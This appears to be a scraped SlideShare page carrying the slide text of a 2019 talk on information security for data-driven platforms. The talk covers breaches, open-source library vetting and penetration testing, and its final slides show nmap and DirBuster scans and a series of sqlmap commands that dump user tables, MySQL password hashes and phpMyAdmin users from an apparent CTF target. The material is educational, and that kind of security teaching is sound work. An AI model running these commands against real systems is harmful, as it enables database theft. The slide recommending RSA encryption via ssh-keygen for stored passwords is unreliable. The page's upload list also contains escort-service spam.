HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
 

Recently uploaded

Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
DianaGray10
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
Zilliz
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
shyamraj55
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
alexjohnson7307
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Feature sql server terbaru performance.pptx
Feature sql server terbaru performance.pptxFeature sql server terbaru performance.pptx
Feature sql server terbaru performance.pptx
ssuser1915fe1
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
bhumivarma35300
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 

Recently uploaded (20)

Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
 
Feature sql server terbaru performance.pptx
Feature sql server terbaru performance.pptxFeature sql server terbaru performance.pptx
Feature sql server terbaru performance.pptx
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 
The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why Information Security is important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
  • 14. Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
  • 18. Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
  • 19. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
  • 20. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
  • 21. Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
  • 32. Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
  • 33. Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
  • 44. Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
  • 71. Hope you had a fun!
  • 72. Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri